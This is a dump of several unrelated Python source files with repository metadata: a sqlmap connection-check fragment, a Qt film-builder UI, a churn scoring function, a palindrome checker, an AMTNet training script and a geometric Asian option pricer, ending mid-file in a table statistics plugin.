raise SqlmapDataException(errMsg)\n\n if not suppressOutput and not conf.dummy and not conf.offline:\n infoMsg = \"testing connection to the target URL\"\n logger.info(infoMsg)\n\n try:\n kb.originalPageTime = time.time()\n page, headers, _ = Request.queryPage(content=True, noteResponseTime=False)\n\n rawResponse = \"%s%s\" % (listToStrValue(headers.headers if headers else \"\"), page)\n\n if conf.string:\n infoMsg = \"testing if the provided string is within the \"\n infoMsg += \"target URL page content\"\n logger.info(infoMsg)\n\n if conf.string not in rawResponse:\n warnMsg = \"you provided '%s' as the string to \" % conf.string\n warnMsg += \"match, but such a string is not within the target \"\n warnMsg += \"URL raw response, sqlmap will carry on anyway\"\n logger.warning(warnMsg)\n\n if conf.regexp:\n infoMsg = \"testing if the provided regular expression matches within \"\n infoMsg += \"the target URL page content\"\n logger.info(infoMsg)\n\n if not re.search(conf.regexp, rawResponse, re.I | re.M):\n warnMsg = \"you provided '%s' as the regular expression \" % conf.regexp\n warnMsg += \"which does not have any match within the target URL raw response. sqlmap \"\n warnMsg += \"will carry on anyway\"\n logger.warning(warnMsg)\n\n kb.errorIsNone = False\n\n if any(_ in (kb.serverHeader or \"\") for _ in PRECONNECT_INCOMPATIBLE_SERVERS):\n singleTimeWarnMessage(\"turning off pre-connect mechanism because of incompatible server ('%s')\" % kb.serverHeader)\n conf.disablePrecon = True\n\n if not kb.originalPage and wasLastResponseHTTPError():\n if getLastRequestHTTPError() not in (conf.ignoreCode or []):\n errMsg = \"unable to retrieve page content\"\n raise SqlmapConnectionException(errMsg)\n elif wasLastResponseDBMSError():\n warnMsg = \"there is a DBMS error found in the HTTP response body \"\n warnMsg += \"which could interfere with the results of the tests\"\n logger.warning(warnMsg)\n elif wasLastResponseHTTPError():\n if getLastRequestHTTPError() not in (conf.ignoreCode or []):\n warnMsg = \"the web server responded with an HTTP error code (%d) \" % getLastRequestHTTPError()\n warnMsg += \"which could interfere with the results of the tests\"\n logger.warning(warnMsg)\n else:\n kb.errorIsNone = True\n\n if kb.choices.redirect == REDIRECTION.YES and threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID:\n if (threadData.lastRedirectURL[1] or \"\").startswith(\"https://\") and conf.hostname in getUnicode(threadData.lastRedirectURL[1]):\n conf.url = re.sub(r\"https?://\", \"https://\", conf.url)\n match = re.search(r\":(\\d+)\", threadData.lastRedirectURL[1])\n port = match.group(1) if match else 443\n conf.url = re.sub(r\":\\d+(/|\\Z)\", r\":%s\\g<1>\" % port, conf.url)\n\n except SqlmapConnectionException as ex:\n if conf.ipv6:\n warnMsg = \"check connection to a provided \"\n warnMsg += \"IPv6 address with a tool like ping6 \"\n warnMsg += \"(e.g. 'ping6 -I eth0 %s') \" % conf.hostname\n warnMsg += \"prior to running sqlmap to avoid \"\n warnMsg += \"any addressing issues\"\n singleTimeWarnMessage(warnMsg)\n\n if any(code in kb.httpErrorCodes for code in (_http_client.NOT_FOUND, )):\n errMsg = getSafeExString(ex)\n logger.critical(errMsg)\n\n if conf.multipleTargets:\n return False\n\n msg = \"it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] \"\n if readInput(msg, default='Y', boolean=True):\n raise SqlmapSilentQuitException\n else:\n kb.ignoreNotFound = True\n else:\n raise\n finally:\n kb.originalPage = kb.pageTemplate = threadData.lastPage\n kb.originalCode = threadData.lastCode\n\n if conf.cj and not conf.cookie and not any(_[0] == HTTP_HEADER.COOKIE for _ in conf.httpHeaders) and not conf.dropSetCookie:\n candidate = DEFAULT_COOKIE_DELIMITER.join(\"%s=%s\" % (_.name, _.value) for _ in conf.cj)\n\n message = \"you have not declared cookie(s), while \"\n message += \"server wants to set its own ('%s'). \" % re.sub(r\"(=[^=;]{10}[^=;])[^=;]+([^=;]{10})\", r\"\\g<1>...\\g<2>\", candidate)\n message += \"Do you want to use those [Y/n] \"\n if readInput(message, default='Y', boolean=True):\n kb.mergeCookies = True\n conf.httpHeaders.append((HTTP_HEADER.COOKIE, candidate))\n\n return True\n\ndef checkInternet():\n content = Request.getPage(url=CHECK_INTERNET_ADDRESS, checking=True)[0]\n return CHECK_INTERNET_VALUE in (content or \"\")\n\ndef setVerbosity(): # Cross-referenced function\n raise NotImplementedError\n","repo_name":"sqlmapproject/sqlmap","sub_path":"lib/controller/checks.py","file_name":"checks.py","file_ext":"py","file_size_in_byte":75758,"program_lang":"python","lang":"en","doc_type":"code","stars":28899,"dataset":"github-code","pt":"38"} +{"seq_id":"24849957365","text":"import os\nfrom PySide2 import QtWidgets, QtCore, QtGui\nimport threading\n\nimport sys\nsys.path.append(os.path.dirname(__file__))\n\nimport filmBuilder\n\n\nclass FilmBuilderUI(QtWidgets.QWidget):\n def __init__(self):\n super(FilmBuilderUI, self).__init__()\n self.buildUI()\n\n def buildUI(self):\n self.mainLayout = QtWidgets.QVBoxLayout(self)\n # self.mainLayout.setContentsMargins(0, 0, 0, 0)\n self.mainLayout.setSpacing(0)\n\n self.setLayout(self.mainLayout)\n\n self.mainLayout.addWidget(QtWidgets.QLabel(\"Sequences:\"))\n self.radioButtons = []\n for sequence in filmBuilder.sequences:\n # Create a radio button for the sequence and add it to the layout\n sequenceButton = QtWidgets.QRadioButton(sequence)\n self.mainLayout.addWidget(sequenceButton)\n self.radioButtons.append(sequenceButton)\n\n self.mainLayout.addWidget(QtWidgets.QLabel(\"Entire film:\"))\n\n filmButton = QtWidgets.QRadioButton(\"Build entire film\")\n self.mainLayout.addWidget(filmButton)\n self.radioButtons.append(filmButton)\n\n spacerWidget = QtWidgets.QWidget()\n spacerWidget.setFixedHeight(50)\n self.mainLayout.addWidget(spacerWidget)\n\n self.buildButton = QtWidgets.QPushButton(\"Build\")\n self.buildButton.setMinimumHeight(50)\n self.buildButton.clicked.connect(self.buildFilm)\n self.mainLayout.addWidget(self.buildButton)\n\n def buildFilm(self):\n # Get the currently selected radio button\n selected = None\n for button in self.radioButtons:\n if button.isChecked():\n selected = button.text()\n break\n\n if selected is None:\n print(\"Nothing selected\")\n return\n\n if selected == \"Build entire film\":\n thread = threading.Thread(target=filmBuilder.buildFilm)\n thread.start()\n else:\n thread = threading.Thread(target=filmBuilder.buildSequence, args=(selected,))\n thread.start()\n\n # self.close()\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication([])\n window = FilmBuilderUI()\n window.setWindowTitle(\"Film Builder\")\n window.setMinimumSize(400, 400)\n window.show()\n app.exec_()\n","repo_name":"gabrieljreed/unfamiliar_pipe","sub_path":"pipe/tools/nukeTools/filmBuilder/filmBuilderUI.py","file_name":"filmBuilderUI.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"38746782416","text":"import random\n\ndef assess(items):\n\n results = []\n\n # Simple ML, each dropped call doubles the churn likelyhood.\n # Better algorithms exist, substitute your own.\n for item in items:\n csv = item.split(\",\")\n\n # Call dropped\n dropped_str = csv[5]\n if dropped_str.lower() == \"true\":\n dropped = True\n else:\n dropped = False\n\n # Current sentiment\n current_str = csv[21]\n if current_str == \"\":\n current_pct = float(0.0)\n else:\n current_pct = float(current_str)\n\n # Previous sentiment\n previous_str = csv[22]\n if previous_str == \"\":\n previous_pct = float(0.0)\n else:\n previous_pct = float(previous_str)\n\n #####################################\n # Business logic\n # --------------\n # Step up by more annoyance each time\n # a call is dropped. Don't yet reduce\n # level if lots of successful calls.\n # Add some randomness so all data\n # not the exact same.\n #####################################\n if dropped:\n old_annoyance = current_pct - previous_pct\n new_annoyance = float(3.1) + old_annoyance + current_pct + random.random()\n else:\n new_annoyance = current_pct\n #####################################\n if new_annoyance > float(100.0):\n new_annoyance = float(100.0)\n #####################################\n\n # Append new_annoyance level to original input, plus the input current annoyance becomes output previous annoyance\n results.append(item + \",\" + str(new_annoyance) + \",\" + str(current_pct))\n\n return results\n","repo_name":"hazelcast/hazelcast-platform-demos","sub_path":"telco/churn/jet-jobs/src/main/resources/python/trainedmodel.py","file_name":"trainedmodel.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"38"} +{"seq_id":"38540594003","text":"def cleanUp(x):\n x = x.lower()\n for punc in \" ,.!@#$%^&*()-=_+{}[]|;:'\":\n x = x.replace(punc, \"\")\n \n return x\n\ndef isPalindrome(s):\n s = cleanUp(s)\n \n if s == s[::-1]:\n return True\n else:\n return False\n\na = input(\"What is your word? \")\nif isPalindrome(a):\n print(\"Yay! Your word is a palindrome.\")\nelse:\n print(\"Nope. Not a palindrome.\")","repo_name":"KGeetings/CMSC-115","sub_path":"In Class/Palindrome.py","file_name":"Palindrome.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"17756650482","text":"\"\"\" \n\nAuthor: Gurkirt Singh \nModified from https://github.com/gurkirt/realtime-action-detection\nLicensed under The MIT License [see LICENSE for details]\n\n\"\"\"\n\nimport os\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.init as init\nimport argparse\nfrom torch.autograd import Variable\nimport torch.utils.data as data\nfrom data import v2, ActionDetection, NormliseBoxes, detection_collate, CLASSES, BaseTransform\nfrom utils.augmentations import SSDAugmentation\nfrom layers.modules import MultiboxLoss\nfrom layers.functions import PriorBox\nfrom layers import MatchPrior\nfrom AMTNet import AMTNet\nimport numpy as np\nimport time, pdb\nfrom utils.evaluation import evaluate_detections\nfrom layers.box_utils import nms, decode_seq\nfrom utils import AverageMeter\nfrom torch.optim.lr_scheduler import MultiStepLR\n# from torchviz import make_dot, make_dot_from_trace\n\ndef str2bool(v):\n return v.lower() in (\"yes\", \"true\", \"t\", \"1\")\n\nparser = argparse.ArgumentParser(description='AMTNet detection training script')\nparser.add_argument('--version', default='v2', help='conv11_2(v2) or pool6(v1) as last layer')\nparser.add_argument('--basenet', default='vgg16_reducedfc.pth', help='pretrained base model')\nparser.add_argument('--dataset', default='ucf24', help='pretrained base model')\nparser.add_argument('--train_split', default=1, type=int, help='Split id')\nparser.add_argument('--ssd_dim', default=300, type=int, help='Input Size for SSD') # only support 300 now\nparser.add_argument('--seq_len', default=2, type=int, help='Input sequence length ')\nparser.add_argument('--seq_gap', default=0, type=int, help='Gap between the frame of sequence')\nparser.add_argument('--fusion_type', default='cat', type=str, \n help='Fusion type to fuse from sequence of frames; options are SUM, CAT and NONE')\n # \nparser.add_argument('--input_type_base', default='rgb', type=str, help='INput tyep default rgb can take flow (brox or fastOF) as well')\nparser.add_argument('--input_type_extra', default='brox', type=str, help='INput tyep default brox can take flow (brox or fastOF) as well')\nparser.add_argument('--input_frames_base', default=1, type=int, help='Number of input frame, default for rgb is 1')\nparser.add_argument('--input_frames_extra', default=5, type=int, help='Number of input frame, default for flow is 5')\nparser.add_argument('--jaccard_threshold', default=0.5, type=float, help='Min Jaccard index for matching')\nparser.add_argument('--batch_size', default=4, type=int, help='Batch size for training')\nparser.add_argument('--num_workers','-j', default=4, type=int, help='Number of workers used in dataloading')\nparser.add_argument('--max_iter', default=40000, type=int, help='Number of training iterations')\nparser.add_argument('--val_step', default=10000, type=int, help='Number of training iterations')\nparser.add_argument('--cuda', default=1, type=str2bool, help='Use cuda to train model')\nparser.add_argument('--ngpu', default=1, type=int, help='Use cuda to train model')\nparser.add_argument('--lr', '--learning-rate', default=0.0005, type=float, help='initial learning rate')\nparser.add_argument('--momentum', default=0.9, type=float, help='momentum')\nparser.add_argument('--stepvalues', default='10000,30000', type=str, help='step points for learning rate drop')\nparser.add_argument('--weight_decay', default=1e-4, type=float, help='Weight decay for SGD')\nparser.add_argument('--gamma', default=0.1, type=float, help='Gamma update for SGD at for stepwise schedule')\nparser.add_argument('--visdom', default=False, type=str2bool, help='Use visdom to for loss visualization')\nparser.add_argument('--vis_port', default=8095, type=int, help='Port for Visdom Server')\nparser.add_argument('--data_root', default='~/data/', help='Location of where in data is located like images and annotation file')\nparser.add_argument('--save_root', default='~/cache/', help='Location to where we wanr save the checkpoints of models')\nparser.add_argument('--iou_thresh', default=0.5, type=float, help='Evaluation threshold')\nparser.add_argument('--conf_thresh', default=0.01, type=float, help='Confidence threshold for evaluation')\nparser.add_argument('--nms_thresh', default=0.45, type=float, help='NMS threshold')\nparser.add_argument('--default_mult', default=1.0, type=float, help='NMS threshold')\nparser.add_argument('--topk', default=50, type=int, help='topk for evaluation')\nparser.add_argument('--man_seed', default=123, type=int, help='manula seed')\nargs = parser.parse_args()\n\n\nimport socket\nimport getpass\nusername = getpass.getuser()\nhostname = socket.gethostname()\n\nprint('\\n\\n ', username, ' is using ', hostname, '\\n\\n')\nif hostname == 'mars':\n args.data_root = '/mnt/mars-fast/datasets/'\n args.save_root = '/mnt/mars-gamma/'\n args.vis_port = 8097\nelif hostname in ['sun']:\n args.data_root = '/mnt/sun-gamma/'\n args.save_root = '/mnt/sun-gamma/'\n args.vis_port = 8096\nelif hostname == 'mercury':\n args.data_root = '/mnt/mercury-fast/datasets/'\n args.save_root = '/mnt/mercury-beta/'\n args.vis_port = 8098\nelif username == 'gurkirt' and hostname.startswith('comp'):\n args.data_root = '/home/gurkirt/datasets/'\n args.save_root = '/home/gurkirt/cache/'\n args.vis_port = 8097\n visdom=False\n# python train.py --seq_len=2 --num_workers=4 --batch_size=16 --ngpu=2 --fusion_type=NONE --input_type_base=brox --input_frames_base=5 --stepvalues=30000,50000 --max_iter=60000 --val_step=10000 --lr=0.001 \n\ntorch.set_default_tensor_type('torch.FloatTensor')\nnp.random.seed(args.man_seed)\ntorch.manual_seed(args.man_seed)\nif args.cuda:\n torch.cuda.manual_seed_all(args.man_seed)\n\ndef print_node(gdf):\n node_fns = gdf.next_functions\n for fn in node_fns:\n print(fn)\n print_node(fn[0][0])\n \n\ndef main():\n args.cfg = v2\n args.train_sets = 'train'\n args.test_sets = 'test'\n kd = 3\n args.means = (104, 117, 123) \n num_classes = len(CLASSES[args.dataset]) + 1 # only support multiclass datasets, not multilabel\n args.num_classes = num_classes\n args.stepvalues = [int(val) for val in args.stepvalues.split(',')]\n args.loss_reset_step = 30\n # args.val_step = 30000\n args.print_step = 10\n args.fusion_type = args.fusion_type.lower()\n args.fusion = args.fusion_type in ['sum','cat','mean']\n ## Define the experiment Name will used for save directory and ENV for visdom\n if not args.fusion:\n args.exp_name = 'AMTNet-{}-s{:d}-{}-sl{:02d}sg{:02d}-bs{:02d}-lr{:05d}'.format(args.dataset, args.train_split,\n args.input_type_base,\n args.seq_len, args.seq_gap, \n args.batch_size, int(args.lr * 100000))\n else:\n args.exp_name = 'AMTNet-{}-s{:d}-{}-{}-{}-sl{:02d}sg{:02d}-bs{:02d}-lr{:05d}'.format(args.dataset, args.train_split,\n args.fusion_type, args.input_type_base,\n args.input_type_extra,\n args.seq_len, args.seq_gap, \n args.batch_size,int(args.lr * 100000))\n\n \n \n\n num_feat_multiplier = {'cat': 2, 'sum': 1, 'mean': 1, 'none': 1}\n # fusion type can one of the above keys\n args.fmd = [512, 1024, 512, 256, 256, 256]\n args.kd = 3\n args.fusion_num_muliplier = num_feat_multiplier[args.fusion_type]\n\n ## DEFINE THE NETWORK\n net = AMTNet(args)\n \n if args.fusion:\n base_weights = torch.load(args.save_root +'weights/AMTNet_single_stream_{:s}_s{:02d}.pth'.format(args.input_type_base, args.train_split))\n extra_weights = torch.load(args.save_root + '/weights/AMTNet_single_stream_{:s}_s{:02d}.pth'.format(args.input_type_extra, args.train_split))\n print('Loading base network...')\n net.core_base.load_my_state_dict(base_weights, input_frames=args.input_frames_base)\n net.core_extra.load_my_state_dict(extra_weights, input_frames=args.input_frames_extra)\n else:\n base_weights = torch.load(args.data_root +'/weights/{}-ssd300_ucf24_120000.pth'.format(args.input_type_base))\n net.core_base.load_my_state_dict(base_weights, input_frames=args.input_frames_base)\n \n args.data_root += args.dataset + '/'\n args.save_root += args.dataset + '/'\n\n net = net.cuda()\n\n def xavier(param):\n init.xavier_uniform_(param)\n\n def weights_init(m):\n if isinstance(m, nn.Conv2d):\n xavier(m.weight.data)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n xavier(m.weight.data)\n m.bias.data.zero_()\n\n print('Initializing weights for HEADs...')\n net.loc.apply(weights_init)\n net.conf.apply(weights_init)\n\n args.save_root = args.save_root + 'cache/' + args.exp_name + '/'\n if not os.path.isdir(args.save_root):\n os.makedirs(args.save_root)\n\n if args.ngpu>1:\n print('\\nLets do dataparallel\\n\\n')\n net = torch.nn.DataParallel(net)\n\n parameter_dict = dict(net.named_parameters()) # Get parmeter of network in dictionary format wtih name being key\n params = []\n\n #Set different learning rate to bias layers and set their weight_decay to 0\n mult = 1; decay = 0\n\n for name, param in parameter_dict.items():\n if name.find('bias') > -1:\n mult = 2.0; decay = 0\n else:\n mult = 1.0; decay = 1\n if name.find('vgg')> -1 or name.find('extra')>-1 or name.find('L2Norm')>-1:\n mult = mult/args.seq_len\n\n # print(name, 'layer parameters will be trained @ {}'.format(args.lr*mult))\n params += [{'params':[param], 'lr': args.lr*mult, 'weight_decay':args.weight_decay*decay}]\n\n optimizer = optim.SGD(params, lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)\n criterion = MultiboxLoss()\n\n scheduler = MultiStepLR(optimizer, milestones=args.stepvalues, gamma=args.gamma)\n # Get proior or anchor boxes\n with torch.no_grad():\n priorbox = PriorBox(v2, args.seq_len)\n priors = priorbox.forward()\n train(args, net, priors, optimizer, criterion, scheduler)\n\n\ndef train(args, net, priors, optimizer, criterion, scheduler):\n log_file = open(args.save_root+\"training.log\", \"w\", 1)\n log_file.write(args.exp_name+'\\n')\n for arg in sorted(vars(args)):\n print(arg, getattr(args, arg))\n log_file.write(str(arg)+': '+str(getattr(args, arg))+'\\n')\n\n net.train()\n # loss counters\n batch_time = AverageMeter()\n losses = AverageMeter()\n loc_losses = AverageMeter()\n cls_losses = AverageMeter()\n\n print('Loading Dataset...')\n train_dataset = ActionDetection(args, args.train_sets, SSDAugmentation(args.ssd_dim, args.means),\n NormliseBoxes(), anno_transform=MatchPrior(priors, args.cfg['variance']))\n log_file.write(train_dataset.print_str)\n print(train_dataset.print_str)\n val_dataset = ActionDetection(args, args.test_sets, BaseTransform(args.ssd_dim, args.means),\n NormliseBoxes(), full_test=False)\n log_file.write(val_dataset.print_str)\n # print(val_dataset.print_str)\n epoch_size = len(train_dataset) // args.batch_size\n\n print('Training SSD on', train_dataset.name)\n\n if args.visdom:\n\n import visdom\n viz = visdom.Visdom(env=args.exp_name, port=args.vis_port)\n # initialize visdom loss plot\n lot = viz.line(\n X=torch.zeros((1,)).cpu(),\n Y=torch.zeros((1, 6)).cpu(),\n opts=dict(\n xlabel='Iteration',\n ylabel='Loss',\n title='Current SSD Training Loss',\n legend=['REG', 'CLS', 'AVG', 'S-REG', ' S-CLS', ' S-AVG']\n )\n )\n # initialize visdom meanAP and class APs plot\n legends = ['meanAP']\n for cls in CLASSES[args.dataset]:\n legends.append(cls)\n val_lot = viz.line(\n X=torch.zeros((1,)).cpu(),\n Y=torch.zeros((1,args.num_classes)).cpu(),\n opts=dict(\n xlabel='Iteration',\n ylabel='Mean AP',\n title='Current SSD Validation mean AP',\n legend=legends\n )\n )\n\n\n batch_iterator = None\n train_data_loader = data.DataLoader(train_dataset, args.batch_size, num_workers=args.num_workers,\n shuffle=True, collate_fn=detection_collate, pin_memory=True)\n val_data_loader = data.DataLoader(val_dataset, args.batch_size, num_workers=args.num_workers,\n shuffle=False, collate_fn=detection_collate, pin_memory=True)\n itr_count = 0\n torch.cuda.synchronize()\n t0 = time.perf_counter()\n for iteration in range(args.max_iter + 1):\n if (not batch_iterator) or (iteration % epoch_size == 0):\n # create batch iterator\n batch_iterator = iter(train_data_loader)\n\n # load train data\n images, _ , prior_gt_labels, prior_gt_locations, _, _ = next(batch_iterator)\n # images, ground_truths, _ , _, num_mt, img_indexs\n # pdb.set_trace()\n images = [img.cuda(0, non_blocking=True) for img in images if not isinstance(img, list)]\n prior_gt_labels = prior_gt_labels.cuda(0, non_blocking=True)\n prior_gt_locations = prior_gt_locations.cuda(0, non_blocking=True)\n # forward\n cls_out, reg_out = net(images)\n\n optimizer.zero_grad()\n loss_l, loss_c = criterion(cls_out, reg_out, prior_gt_labels, prior_gt_locations)\n loss = loss_l + loss_c\n\n loss.backward()\n optimizer.step()\n scheduler.step()\n\n # pdb.set_trace()\n loc_loss = loss_l.item()\n conf_loss = loss_c.item()\n # print('Loss data type ',type(loc_loss))\n loc_losses.update(loc_loss)\n cls_losses.update(conf_loss)\n losses.update((loc_loss + conf_loss)/2.0)\n\n if iteration == 103:\n loc_losses.reset()\n cls_losses.reset()\n losses.reset()\n batch_time.reset()\n\n if iteration % args.print_step == 0:\n if args.visdom and iteration>100:\n losses_list = [loc_losses.val, cls_losses.val, losses.val, loc_losses.avg, cls_losses.avg, losses.avg]\n viz.line(X=torch.ones((1, 6)).cpu() * iteration,\n Y=torch.from_numpy(np.asarray(losses_list)).unsqueeze(0).cpu(),\n win=lot,\n update='append')\n\n\n torch.cuda.synchronize()\n t1 = time.perf_counter()\n batch_time.update(t1 - t0)\n\n print_line = 'Itration {:02d}/{:06d}/{:06d} loc-loss {:.3f}({:.3f}) cls-loss {:.3f}({:.3f}) ' \\\n 'average-loss {:.3f}({:.3f}) Timer {:0.3f}({:0.3f})'.format(iteration//epoch_size,\n iteration, args.max_iter, loc_losses.val, loc_losses.avg, cls_losses.val,\n cls_losses.avg, losses.val, losses.avg, batch_time.val, batch_time.avg)\n\n torch.cuda.synchronize()\n t0 = time.perf_counter()\n log_file.write(print_line+'\\n')\n print(print_line)\n\n itr_count += 1\n\n if itr_count % args.loss_reset_step == 0 and itr_count > 0:\n loc_losses.reset()\n cls_losses.reset()\n losses.reset()\n batch_time.reset()\n print('Reset ', args.exp_name,' after', itr_count*args.print_step)\n itr_count = 0\n\n\n if (iteration % args.val_step == 0 or iteration in [1000, args.max_iter]) and iteration>0:\n torch.cuda.synchronize()\n tvs = time.perf_counter()\n print('Saving state, iter:', iteration)\n torch.save(net.state_dict(), args.save_root + 'AMTNet_' +\n repr(iteration) + '.pth')\n\n net.eval() # switch net to evaluation mode\n with torch.no_grad():\n mAP, ap_all, ap_strs = validate(args, net, priors, val_data_loader, val_dataset, iteration, iou_thresh=args.iou_thresh)\n\n for ap_str in ap_strs:\n print(ap_str)\n log_file.write(ap_str+'\\n')\n ptr_str = '\\nMEANAP:::=>'+str(mAP)+'\\n'\n print(ptr_str)\n log_file.write(ptr_str)\n\n if args.visdom:\n aps = [mAP]\n for ap in ap_all:\n aps.append(ap)\n viz.line(\n X=torch.ones((1, args.num_classes)).cpu() * iteration,\n Y=torch.from_numpy(np.asarray(aps)).unsqueeze(0).cpu(),\n win=val_lot,\n update='append'\n )\n net.train() # Switch net back to training mode\n torch.cuda.synchronize()\n t0 = time.perf_counter()\n prt_str = '\\nValidation TIME::: {:0.3f}\\n\\n'.format(t0-tvs)\n print(prt_str)\n log_file.write(ptr_str)\n\n log_file.close()\n\n\ndef validate(args, net, priors, val_data_loader, val_dataset, iteration_num, iou_thresh=0.5):\n \"\"\"Test a SSD network on an image database.\"\"\"\n print('Validating at ', iteration_num)\n num_images = len(val_dataset)\n num_classes = args.num_classes\n priors = priors.cuda()\n det_boxes = [[] for _ in range(len(CLASSES[args.dataset]))]\n gt_boxes = []\n print_time = True\n batch_iterator = None\n val_step = 100\n count = 0\n torch.cuda.synchronize()\n ts = time.perf_counter()\n softmax = nn.Softmax(dim=2).cuda()\n with torch.no_grad():\n for val_itr in range(len(val_data_loader)):\n if not batch_iterator:\n batch_iterator = iter(val_data_loader)\n\n torch.cuda.synchronize()\n t1 = time.perf_counter()\n\n images, ground_truths, _ , _, num_mt, img_indexs = next(batch_iterator)\n batch_size = images[0].size(0)\n #images = images.permute(1, 0, 2, 3, 4)\n height, width = images[0].size(3), images[0].size(4)\n\n images = [img.cuda(0, non_blocking=True) for img in images if not isinstance(img, list)]\n\n conf_preds, loc_data = net(images)\n \n # pdb.set_trace()\n conf_scores_all = softmax(conf_preds).clone()\n \n\n if print_time and val_itr%val_step == 0:\n torch.cuda.synchronize()\n tf = time.perf_counter()\n print('Forward Time {:0.3f}'.format(tf-t1))\n \n for b in range(batch_size):\n # pdb.set_trace()\n inds = np.asarray([m*args.seq_len for m in range(num_mt[b])])\n # pdb.set_trace()\n gt = ground_truths[b].numpy()\n gt = gt[inds]\n gt[:,0] *= width\n gt[:,2] *= width\n gt[:,1] *= height\n gt[:,3] *= height\n gt_boxes.append(gt)\n decoded_boxes = decode_seq(loc_data[b], priors, args.cfg['variance'], args.seq_len)\n decoded_boxes = decoded_boxes[:,:4].clone()\n conf_scores = conf_scores_all[b].clone()\n #Apply nms per class and obtain the results\n for cl_ind in range(1, num_classes):\n # pdb.set_trace()\n scores = conf_scores[:, cl_ind].squeeze()\n c_mask = scores.gt(args.conf_thresh) # greater than minmum threshold\n scores = scores[c_mask].squeeze() # reduce the dimension so if no element then # of dim is 0\n if scores.dim() == 0:\n det_boxes[cl_ind - 1].append(np.asarray([]))\n continue\n boxes = decoded_boxes.clone()\n l_mask = c_mask.unsqueeze(1).expand_as(boxes)\n boxes = boxes[l_mask].view(-1, 4)\n # idx of highest scoring and non-overlapping boxes per class\n ids, counts = nms(boxes, scores, args.nms_thresh, args.topk) # idsn - ids after nms\n scores = scores[ids[:counts]].cpu().numpy()\n boxes = boxes[ids[:counts]].cpu().numpy()\n # print('boxes sahpe',boxes.shape)\n boxes[:,0] *= width\n boxes[:,2] *= width\n boxes[:,1] *= height\n boxes[:,3] *= height\n\n for ik in range(boxes.shape[0]):\n boxes[ik, 0] = max(0, boxes[ik, 0])\n boxes[ik, 2] = min(width, boxes[ik, 2])\n boxes[ik, 1] = max(0, boxes[ik, 1])\n boxes[ik, 3] = min(height, boxes[ik, 3])\n cls_dets = np.hstack((boxes, scores[:, np.newaxis])).astype(np.float32, copy=True)\n det_boxes[cl_ind-1].append(cls_dets)\n count += 1\n\n if val_itr%val_step == 0:\n torch.cuda.synchronize()\n te = time.perf_counter()\n print('im_detect: {:d}/{:d} time taken {:0.3f}'.format(count, num_images, te-ts))\n torch.cuda.synchronize()\n ts = time.perf_counter()\n if print_time and val_itr%val_step == 0:\n torch.cuda.synchronize()\n te = time.perf_counter()\n print('NMS stuff Time {:0.3f}'.format(te - tf))\n print('Evaluating detections for itration number ', iteration_num)\n return evaluate_detections(gt_boxes, det_boxes, CLASSES[args.dataset], iou_thresh=iou_thresh)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gurkirt/AMTNet","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":21949,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"} +{"seq_id":"35577905924","text":"\"\"\"\nImplement closed-form formulas for geometric Asian call/put options.\n# @Author: Zhang Weibin\n\"\"\"\nimport math\nfrom math import e\nfrom scipy.stats import norm\n\nclass GeoAsianOption():\n \n def __init__(self, S, sigma, r, T, K, n):\n \n # the Spot Price of Asset S(0)\n self.S = S\n # the Implied Volatility\n self.sigma = sigma\n # the Risk-free Interest Rate\n self.r = r\n # Time to Maturity (in year)\n self.T = T\n # the Strike\n self.K = K\n # the number of observation times for the geometric average\n self.n = n\n \n # for call option\n def CallGeoAsian(self):\n \n S, sigma, r, T, K, n = self.S, self.sigma, self.r, self.T, self.K, self.n\n \n sigma_hat = sigma*math.sqrt(((n + 1)*(2*n + 1))/(6*n**2))\n mu = (r - (1/2)*sigma**2)*((n+1)/(2*n))+(1/2)*sigma_hat**2\n \n d1 = ((math.log(S/K) + (mu + (1/2)*sigma_hat**2))*T)/(sigma_hat*math.sqrt(T))\n d2 = d1 - sigma_hat*math.sqrt(T)\n \n N_d1_P = norm.cdf(d1)\n N_d2_P = norm.cdf(d2)\n\n # the closed-form formulas for geometric Asian call option \n Call = e**(-(r*T))*(S*e**(mu*T)*N_d1_P - K*N_d2_P)\n \n return Call\n\n # for put option\n def PutGeoAsian(self):\n \n S, sigma, r, T, K, n = self.S, self.sigma, self.r, self.T, self.K, self.n\n \n sigma_hat = sigma*math.sqrt(((n + 1)*(2*n + 1))/(6*n**2))\n mu = (r - (1/2)*sigma**2)*((n+1)/(2*n))+(1/2)*sigma_hat**2\n \n d1 = ((math.log(S/K) + (mu + (1/2)*sigma_hat**2))*T)/(sigma_hat*math.sqrt(T))\n d2 = d1 - sigma_hat*math.sqrt(T)\n \n N_d1_N = norm.cdf(-d1)\n N_d2_N = norm.cdf(-d2)\n \n # the closed-form formulas for geometric Asian put option \n Put = e**(-(r*T))*(K*N_d2_N - S*e**(mu*T)*N_d1_N)\n \n return Put\n ","repo_name":"bjwu/option_pricing","sub_path":"CFGeoAsianOption.py","file_name":"CFGeoAsianOption.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"38"} +{"seq_id":"71225585071","text":"from sciapp.action import Table\nimport pandas as pd\n\nclass Statistic(Table):\n\ttitle = 'Table Statistic'\n\tnote = ['auto_snap', 'num_only', 'auto_msk']\n\n\tpara = {'axis':'Column', 'sum':True, 'mean':True,'max':False, \n\t\t'min':False,'var':False,'std':False,'skew':False,'kurt':False}\n\t\t\n\tview = [(list, 'axis', ['Row', 'Column'], str, 'axis', ''),\n\t\t\t(bool, 'sum', 'sum'),\n\t\t\t(bool, 'mean', 'mean'),\n\t\t\t(bool, 'max', 'max'),\n\t\t\t(bool, 'min', 'min'),\n\t\t\t(bool, 'var', 'var'),\n\t\t\t(bool, 'std', 'std'),\n\t\t\t(bool, 'skew', 